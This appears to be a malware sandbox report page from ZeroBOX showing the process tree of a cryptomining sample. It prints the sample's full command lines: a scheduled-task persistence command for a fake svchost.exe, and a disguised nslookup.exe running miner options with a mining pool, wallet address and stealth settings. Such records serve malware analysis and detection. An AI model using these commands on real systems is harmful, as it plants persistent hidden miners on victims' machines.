| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

| ZeroBOX

svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
2020
- cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
  1976
  - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
    3028
- sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  812
- nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=49XarhMHsp18ZAs9SiucnGHv3LcK7qChbLKquEQftqmbXayAcpYVdHr5Dy6Z7n8EKeKJzjDcms3dJfpC2S2jMGLcFaWBZHG --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
  872

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf